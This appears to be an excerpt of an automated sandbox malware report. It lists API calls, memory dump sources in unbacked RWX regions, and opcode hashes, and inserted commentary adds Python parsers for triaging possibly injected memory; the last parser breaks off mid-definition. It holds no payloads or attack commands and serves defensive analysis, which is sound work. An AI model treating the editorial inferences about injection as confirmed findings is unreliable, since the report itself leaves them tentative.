                                                                                                                • Opcode ID: 821e0174830e2e26f58afe7ab52cc15521e405b1cd0f4f2b92e77dd2ec118577
                                                                                                                • Instruction ID: 89936b288a01fe09e0d150146cdede32222bd4628942adfb7c39a2c4c8d2c2ef
                                                                                                                • Opcode Fuzzy Hash: 821e0174830e2e26f58afe7ab52cc15521e405b1cd0f4f2b92e77dd2ec118577
                                                                                                                • Instruction Fuzzy Hash: 3521D5B59002199FDB10CFA9D584ADEBBF8FF48324F14846AE954A3311D379A944CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02BBB229,00000800,00000000,00000000), ref: 02BBB43A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 25833c7108e03c0152fbce2bc62851c03c1984e0ea7b53a3a6ce0e73b6e6843e
                                                                                                                • Instruction ID: 189c5f62f13b9f063028a45fe1fc631f8903c9a6cf7a08a3ce360174577aabb4
                                                                                                                • Opcode Fuzzy Hash: 25833c7108e03c0152fbce2bc62851c03c1984e0ea7b53a3a6ce0e73b6e6843e
                                                                                                                • Instruction Fuzzy Hash: E411D6B69006099FCB10CF9AD444BEEBBF8FF58314F14846AE915A7700C3B5A545CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02BBB229,00000800,00000000,00000000), ref: 02BBB43A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID:
                                                                                                                • API String ID: 1029625771-0
                                                                                                                • Opcode ID: 326e66b449535298fbdfb7723bf3f4c76d20b0734f7af6da0e186ea6df5ba35c
                                                                                                                • Instruction ID: 95f524ae8ebcb4b9d3ace56e08b84bf70a224258ede91ab68a63a11a830a4726
                                                                                                                • Opcode Fuzzy Hash: 326e66b449535298fbdfb7723bf3f4c76d20b0734f7af6da0e186ea6df5ba35c
                                                                                                                • Instruction Fuzzy Hash: 3211D6B69002498FCB10CFA9D444BEEBBF5FF98314F14846AD855B7600C7B5A545CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02BBB1AE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 4890a5a169868dcf41ac55d345da9426dc9e53da9378442f334289510010ee21
                                                                                                                • Instruction ID: 6cc7f46a0ed04ca4161f8bfd5944e1eaab4c1826b66b68f59dcf40de4f7a8c2f
                                                                                                                • Opcode Fuzzy Hash: 4890a5a169868dcf41ac55d345da9426dc9e53da9378442f334289510010ee21
                                                                                                                • Instruction Fuzzy Hash: EF11E6B5D006498FCB10CF9AD444BDEFBF8EF48228F14846AD859B7600C3B5A545CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.677864589.000000000127D000.00000040.00000001.sdmp, Offset: 0127D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 872eec3ac8ffa36a32aa5e2718f8622b44cd3d29a171223bd6669deb0f6117d1
                                                                                                                • Instruction ID: 5cea311bb8c8a3fe6832d79dc9ec948049c4d2cea70f7cfd2c261bac74773b95
                                                                                                                • Opcode Fuzzy Hash: 872eec3ac8ffa36a32aa5e2718f8622b44cd3d29a171223bd6669deb0f6117d1
                                                                                                                • Instruction Fuzzy Hash: E12125B1510248DFDF01CF94E9C0B17BF65FF88328F248569E9050B206C376D856CBA2
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.677902913.000000000128D000.00000040.00000001.sdmp, Offset: 0128D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0705e89d2e191c6592d118c6365f76a5ff263a67b95ead3a883c530640775ac2
                                                                                                                • Instruction ID: 4a26d13da4e82f437aed209c89b36a46feea05e1eb5fa8d21f4ee1f2857eaf7e
                                                                                                                • Opcode Fuzzy Hash: 0705e89d2e191c6592d118c6365f76a5ff263a67b95ead3a883c530640775ac2
                                                                                                                • Instruction Fuzzy Hash: 1F214570514308DFDB11EFA4D8C0B16BB65FB84354F20C96DD9490B2C2C376D84BCA61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.677864589.000000000127D000.00000040.00000001.sdmp, Offset: 0127D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4e84e0a810b078f59bf680f02f443504771625cd364d6cf2adbe6498a920f295
                                                                                                                • Instruction ID: fdd750c7a9bc89960aaaa0cf8233dffaea17081d3247fd5f4ed3f2e476c42b66
                                                                                                                • Opcode Fuzzy Hash: 4e84e0a810b078f59bf680f02f443504771625cd364d6cf2adbe6498a920f295
                                                                                                                • Instruction Fuzzy Hash: 7711D3B6404285DFCF12CF54E5C4B16BF72FF84324F2486A9D9050B656C33AD45ACBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.677902913.000000000128D000.00000040.00000001.sdmp, Offset: 0128D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 060be9c64a267e7320531a2be496baeaf4a0ec0d57eb94b123eafdc4f5147a6b
                                                                                                                • Instruction ID: b82286bd45a92b93bc5e01c7f73818fe004112175ad0a9592c74814daa3963aa
                                                                                                                • Opcode Fuzzy Hash: 060be9c64a267e7320531a2be496baeaf4a0ec0d57eb94b123eafdc4f5147a6b
                                                                                                                • Instruction Fuzzy Hash: 8B11EE75404284CFDB02CF54D5C0B15BB62FB44314F24C6A9D9494B696C33AD40BCB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.677864589.000000000127D000.00000040.00000001.sdmp, Offset: 0127D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0f6cee179af320437eac5cb08f8b8906f677117334bcbe06ecf5e8f7e3742543
                                                                                                                • Instruction ID: 00d2f644bbc3e0c93c7096f20120dfd2104605a28be5cf7e3bf3838d96eb6f2e
                                                                                                                • Opcode Fuzzy Hash: 0f6cee179af320437eac5cb08f8b8906f677117334bcbe06ecf5e8f7e3742543
                                                                                                                • Instruction Fuzzy Hash: 76012B714143C89AE7144E99CDC4B67FF9CDF81278F08851AEF041F242D7799844CAB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.677864589.000000000127D000.00000040.00000001.sdmp, Offset: 0127D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0b9e4371797b25194bec2b2b38e21ac4651038392b09cc2bcf3b29398ff2015a
                                                                                                                • Instruction ID: 41982c721474039cb5aa2d53a38cc76d711fa83e88c1d263ad0853f5ea5f64b6
                                                                                                                • Opcode Fuzzy Hash: 0b9e4371797b25194bec2b2b38e21ac4651038392b09cc2bcf3b29398ff2015a
                                                                                                                • Instruction Fuzzy Hash: E1F0C2714042849AE7148E59CCC4B63FF9CEF81234F18C45AEE081B286C3799844CAB1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Non-executed Functions

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.677391759.00000000008F2000.00000002.00020000.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.677383055.00000000008F0000.00000002.00020000.sdmp
                                                                                                                • Associated: 00000000.00000002.677498178.00000000009B0000.00000002.00020000.sdmp
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                                                                                                • Instruction ID: 047e6c73b2cc168872ddf0039ae9305ef372c034d07092511bbc3a14929810bf
                                                                                                                • Opcode Fuzzy Hash: 19ff0009a3c968d98fd90668b3a3a664d25a6aab53ee2b7e982bc80375fb09c3
                                                                                                                • Instruction Fuzzy Hash: 8662696144F7C19FC7134B746DB56E2BFB1AE6721871E44CBC4C0CE1A3E22A195AE722
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e544db8615cb1f4d1e2cad20ea4bdf47aa89aa1b4cc1adf8818f3b915330af2d
                                                                                                                • Instruction ID: 0e35ed7626818ab3b793549b003f5654cf0824d42c366ed1a86ac4e6fd4afb8e
                                                                                                                • Opcode Fuzzy Hash: e544db8615cb1f4d1e2cad20ea4bdf47aa89aa1b4cc1adf8818f3b915330af2d
                                                                                                                • Instruction Fuzzy Hash: 17A16F36E0021A8FCF06DFB5C8445EDB7B2FF85304B1585AAE805BB261EBB5A955CF40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

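The table above is easier to use for triage once it is grouped by memory region: every entry names the dump it was carved from, whether that dump is "based on PE" (tied to an image mapped from disk) and, in the file name, the page protection of the region. Entries that call Windows APIs from a region that is not PE-backed are the ones whose dump is worth pulling for static analysis, and several call sites are listed more than once under different Opcode IDs (CreateActCtxA at 02BB5591, LoadLibraryExW at 02BBB43A), which should not be counted as separate calls. The following parser is an added example, not part of this report and not Joe Sandbox code. It assumes the .sdmp file name splits on "." into process index (field 0), region base (field 3) and page protection (field 4, where 0x40 is PAGE_EXECUTE_READWRITE); the "based on PE" flag is taken as printed. The sample input is constructed from entries on this page, keeping only the lines the parser reads.

```python
"""Triage helper for the per-function table of a Joe Sandbox style report.
Added example, not part of the original report and not Joe Sandbox code.
Assumption: the .sdmp name splits on '.' into process index (field 0),
region base (field 3) and page protection (field 4; 0x40 is
PAGE_EXECUTE_READWRITE); the 'based on PE' flag is taken as printed.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

PAGE_EXECUTE_READWRITE = 0x40
API_RE = re.compile(r"^•\s*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"^•\s*Source File:\s*(\S+),\s*Offset:\s*[0-9A-Fa-f]+,"
                    r"\s*based on PE:\s*(true|false)$")


@dataclass
class Entry:
    section: str = ""                         # Executed / Non-executed Functions
    apis: list = field(default_factory=list)  # (api name, module, call-site address)
    source_file: str = ""
    pe_backed: bool = False

    @property
    def process(self):
        return self.source_file.split(".")[0]

    @property
    def base(self):
        return self.source_file.split(".")[3]

    @property
    def protection(self):
        return int(self.source_file.split(".")[4], 16)


def parse_entries(text):
    """One Entry per block; a block ends at its 'Uniqueness Score' line.
    A trailing block without that line (a truncated page) is dropped."""
    entries, cur, section = [], Entry(), ""
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("Executed Functions", "Non-executed Functions"):
            section = line
        elif line.startswith("Uniqueness Score"):
            cur.section = section
            entries.append(cur)
            cur = Entry()
        elif m := API_RE.match(line):
            cur.apis.append((m.group(1), m.group(2), m.group(4)))
        elif m := SRC_RE.match(line):
            cur.source_file, cur.pe_backed = m.group(1), m.group(2) == "true"
    return entries


def summarize_regions(entries):
    """Group entries by (process index, region base)."""
    regions = {}
    for e in entries:
        if not e.source_file:
            continue
        r = regions.setdefault((e.process, e.base), {
            "entries": 0, "apis": set(), "pe_backed": e.pe_backed,
            "rwx": e.protection == PAGE_EXECUTE_READWRITE})
        r["entries"] += 1
        r["apis"].update(name for name, _, _ in e.apis)
    return regions


def duplicate_call_sites(entries):
    """module!api@address listed under more than one function entry."""
    seen = defaultdict(int)
    for e in entries:
        for name, module, ref in e.apis:
            seen[f"{module}!{name}@{ref}"] += 1
    return {k: v for k, v in seen.items() if v > 1}


def regions_to_pull(entries):
    """Regions with API-calling code that the report does not tie to a PE image."""
    return sorted(k for k, r in summarize_regions(entries).items()
                  if r["apis"] and not r["pe_backed"])


# Constructed sample: four entries taken from the table above, keeping only the
# lines the parser reads (heading-only lines such as 'Similarity' carry no data).
SAMPLE = """\
Executed Functions
• CreateActCtxA.KERNEL32(?), ref: 02BB5591
• Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
Uniqueness Score: -1.00%
• CreateActCtxA.KERNEL32(?), ref: 02BB5591
• Source File: 00000000.00000002.678090989.0000000002BB0000.00000040.00000001.sdmp, Offset: 02BB0000, based on PE: false
Uniqueness Score: -1.00%
Non-executed Functions
• Source File: 00000000.00000002.677391759.00000000008F2000.00000002.00020000.sdmp, Offset: 008F0000, based on PE: true
Uniqueness Score: -1.00%
Executed Functions
• CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02965422
• Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
Uniqueness Score: -1.00%
"""
```

Running `regions_to_pull(parse_entries(SAMPLE))` returns the 0x02BB0000 region of process 0 and the 0x02960000 region of process 8, both RWX and not PE-backed; the PE-backed region at 0x008F2000 is left alone. For a .NET sample like this one an unbacked RWX region may simply hold JIT output rather than manually mapped code, so compare the pulled dump against the image-backed module before calling it injected. The duplicate detector reports `KERNEL32!CreateActCtxA@02BB5591` twice for the sample, matching the two entries above that share that call site.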
                                                                                                                Executed Functions

                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02965422
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: 7d17e9506486b9e1be4eba2faf232bfd0184802ccee929926a8c7d5dee7d3367
                                                                                                                • Instruction ID: d6f40d8983faa1ebf10a784a7b5958c5df7988fe25e0152c35e3f5602c8288db
                                                                                                                • Opcode Fuzzy Hash: 7d17e9506486b9e1be4eba2faf232bfd0184802ccee929926a8c7d5dee7d3367
                                                                                                                • Instruction Fuzzy Hash: 0151F1B1C00249AFDF11CFA9C984ADEBFB5FF48314F69816AE818AB220D7759855CF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02965422
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: a1e1ac809d3f6a9898f7736f6c575d12a6c506e91fff403f322a77c47d54841b
                                                                                                                • Instruction ID: a451f19d323d066731b7df08e929da1a505e8ec1be0627d94f74e95346daf099
                                                                                                                • Opcode Fuzzy Hash: a1e1ac809d3f6a9898f7736f6c575d12a6c506e91fff403f322a77c47d54841b
                                                                                                                • Instruction Fuzzy Hash: E351BDB1D103099FDB14CFA9C984ADEBBF5FF48314F65862AE819AB210D774A845CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 02967D79
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: CallProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714655100-0
                                                                                                                • Opcode ID: a4ba50b3f40093dcf286e355efbfc6ca265c68ef7d8575a08b4861c996ce9701
                                                                                                                • Instruction ID: 06b6c642c7cd407523ff4d06365b0a876e9d073a62856c8b34f5daf81d7f44e8
                                                                                                                • Opcode Fuzzy Hash: a4ba50b3f40093dcf286e355efbfc6ca265c68ef7d8575a08b4861c996ce9701
                                                                                                                • Instruction Fuzzy Hash: B1410BB49003059FDB14CF99C488AAAFBF9FF88318F248859E51967361D774A845CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 0296C9E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: EncodePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2118026453-0
                                                                                                                • Opcode ID: 155ffd2f979a9418dc19de57488b82237269aecabd89f2b163cf8ef58030d829
                                                                                                                • Instruction ID: ec8fbe3f178202f7c51bdda4b2977e5a6163fade0dd462c4b7573aeacb2723d6
                                                                                                                • Opcode Fuzzy Hash: 155ffd2f979a9418dc19de57488b82237269aecabd89f2b163cf8ef58030d829
                                                                                                                • Instruction Fuzzy Hash: F931C4B58053848FDB20DFA9E64D3AE7FF8FB49318F14846AE484A7242C7796905CF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02966E6F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: de3c6884e1dcd1977c13069b08d78ee911b61d4bd9ebcc0f865cc9cc4f57c464
                                                                                                                • Instruction ID: 7c73d71f47ddd77dc2f51c66be7754dcff028ecad1e7e122426475c7db517716
                                                                                                                • Opcode Fuzzy Hash: de3c6884e1dcd1977c13069b08d78ee911b61d4bd9ebcc0f865cc9cc4f57c464
                                                                                                                • Instruction Fuzzy Hash: B721E3B59002489FDB10CFE9D584AEEBFF8EB48324F14842AE954A3310D778A955CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02966E6F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: f952abab8bb80c43da1e1b3282307c54bd74315b25135b756ae1ac37c9c0b2f2
                                                                                                                • Instruction ID: 19fb14f9876f0afcc0807cd0c2099f1acd01be20d096ec54384725060af50572
                                                                                                                • Opcode Fuzzy Hash: f952abab8bb80c43da1e1b3282307c54bd74315b25135b756ae1ac37c9c0b2f2
                                                                                                                • Instruction Fuzzy Hash: AC21D5B59003499FDB10CFE9D584AEEBBF8FB48324F14842AE955A3310D778A954CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • RtlEncodePointer.NTDLL(00000000), ref: 0296C9E2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: EncodePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2118026453-0
                                                                                                                • Opcode ID: 9275e44df566a5d0958e04bedffd7d7928e74d20c8890d06eb0bcd2e551cd111
                                                                                                                • Instruction ID: 487a709b788740fd16b6a22e23950797082642e634d4ff4d1ab79dd8117b357e
                                                                                                                • Opcode Fuzzy Hash: 9275e44df566a5d0958e04bedffd7d7928e74d20c8890d06eb0bcd2e551cd111
                                                                                                                • Instruction Fuzzy Hash: 0D116DB19013458FDB20DFA9D6497AEBBF8FB48314F24842AE485A3741CB796905CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02964396
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: dd1a9299f284235f1fb996f050c69ccd7de9a7eafeaeea8771bddd01395beaaa
                                                                                                                • Instruction ID: ca8b5226cb85ecc24de0a5275309005965e8b0cba12fc5e2ca41c9c71d00a6b1
                                                                                                                • Opcode Fuzzy Hash: dd1a9299f284235f1fb996f050c69ccd7de9a7eafeaeea8771bddd01395beaaa
                                                                                                                • Instruction Fuzzy Hash: 3D11F3B19007498FCB20CF9AD548BDEBBF8EB49224F14846AD859A7200D375A545CFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02964396
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918928480.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule
                                                                                                                • String ID:
                                                                                                                • API String ID: 4139908857-0
                                                                                                                • Opcode ID: 6dd877711129f5e4276c23150b0082c68f2f2dcf3eb51bfa3b5384dff12943fd
                                                                                                                • Instruction ID: 9a38aa0c038eb427784bebf0561a154dcd51123c4805da23668311206dcd738f
                                                                                                                • Opcode Fuzzy Hash: 6dd877711129f5e4276c23150b0082c68f2f2dcf3eb51bfa3b5384dff12943fd
                                                                                                                • Instruction Fuzzy Hash: F41143B1C003498FCB20CF9AD548BDEFBF8EB88224F14846AD459B7200C378A546CFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918619948.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: d6d4120fedfa2786b320155cccb144e85794e7ae77a4e16e0342a2356f018d62
                                                                                                                • Instruction ID: 6f374949c2d34e86a3d9054016449208c29165c6a2240bb407cedb23470c6e5c
                                                                                                                • Opcode Fuzzy Hash: d6d4120fedfa2786b320155cccb144e85794e7ae77a4e16e0342a2356f018d62
                                                                                                                • Instruction Fuzzy Hash: 752136B1500240DFCF01DF94D8C5B1ABFA5FB88728F2485ADEA450B646C336D456CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918619948.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0457f1df221b050d3705773f450c8da176b4b5a4c8298d1fd12e146d425e834b
                                                                                                                • Instruction ID: 8c91fce6844037add7f98763c0aa837a726a154499c872db3192ebd28d2d28c9
                                                                                                                • Opcode Fuzzy Hash: 0457f1df221b050d3705773f450c8da176b4b5a4c8298d1fd12e146d425e834b
                                                                                                                • Instruction Fuzzy Hash: A52148B1500240DFDF01DF94D8C5B6BBFA5FB84324F2085ACEA450B606C736E446CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918647537.000000000110D000.00000040.00000001.sdmp, Offset: 0110D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5b705acec2cf2a6a1d841e7c0ce46bc25e44f202991e3979232a3013617dfa95
                                                                                                                • Instruction ID: 8f5f5a9c95ffe5b8dea24f230926d164ac13d5a4224bd63b28171790b4924fb1
                                                                                                                • Opcode Fuzzy Hash: 5b705acec2cf2a6a1d841e7c0ce46bc25e44f202991e3979232a3013617dfa95
                                                                                                                • Instruction Fuzzy Hash: 272103B1904244DFDF1ACFD4E8C0B16BB65EB84354F20C969D84D4B28AC7B6D847CA62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918619948.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4e84e0a810b078f59bf680f02f443504771625cd364d6cf2adbe6498a920f295
                                                                                                                • Instruction ID: a2b1ecedb8116ce03d5469d623e0bd126ea818936ee2a4e82d2d53d3220e12fc
                                                                                                                • Opcode Fuzzy Hash: 4e84e0a810b078f59bf680f02f443504771625cd364d6cf2adbe6498a920f295
                                                                                                                • Instruction Fuzzy Hash: 3211B1B6404284DFCB02CF54D5C4B16BFB2FB88324F2486ADD9494B656C336D55ACBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918619948.00000000010FD000.00000040.00000001.sdmp, Offset: 010FD000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4e84e0a810b078f59bf680f02f443504771625cd364d6cf2adbe6498a920f295
                                                                                                                • Instruction ID: 079f76eb5099d8e95398e3fbe363bdedc08def69b96ca4901c4238a53abfa4e0
                                                                                                                • Opcode Fuzzy Hash: 4e84e0a810b078f59bf680f02f443504771625cd364d6cf2adbe6498a920f295
                                                                                                                • Instruction Fuzzy Hash: 0711AFB6404280DFDB12CF54D5C4B16BFB2FB84324F2486ADD9450B656C336D45ACBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.918647537.000000000110D000.00000040.00000001.sdmp, Offset: 0110D000, based on PE: false
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 060be9c64a267e7320531a2be496baeaf4a0ec0d57eb94b123eafdc4f5147a6b
                                                                                                                • Instruction ID: 62fd59b73b3ba52dfba6c4f1b7f1253e7c5ddd2b5c1f82840c2b64b61e36f268
                                                                                                                • Opcode Fuzzy Hash: 060be9c64a267e7320531a2be496baeaf4a0ec0d57eb94b123eafdc4f5147a6b
                                                                                                                • Instruction Fuzzy Hash: A811EE75904280CFCB06CF54E5C0B15BB62FB44324F24C6A9D8094B69AC37AD40ACB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%
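
The entries above are the raw output of the sandbox's function listing: each "Executed Functions" record names the API referenced from a recovered function, the memory dump it was carved from ("based on PE: false" for every entry here, with a dump name whose fifth dotted field is 00000040), and the Opcode/Instruction IDs that let analysts pivot across samples. Two of the 010FD000 records share an Opcode ID while their Instruction IDs differ. The following parser is an added example, not code from the report or from the sandbox vendor; it turns entries in this layout into records, decodes the dump-name fields, and pulls out two things a triage analyst wants: API references made from executable memory that has no PE file behind it, and Opcode IDs reused across entries. Reading the first dotted field of the dump name as the PID and the fifth as a Windows PAGE_* protection value (00000040 = PAGE_EXECUTE_READWRITE) is an assumption about the naming convention; the sample text is constructed from a few of the entries above.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# winnt.h page-protection constants, used to decode the fifth dotted field of
# an .sdmp name. Treating that field as the region's protection, and the first
# as the PID, is an assumption about the sandbox naming convention.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
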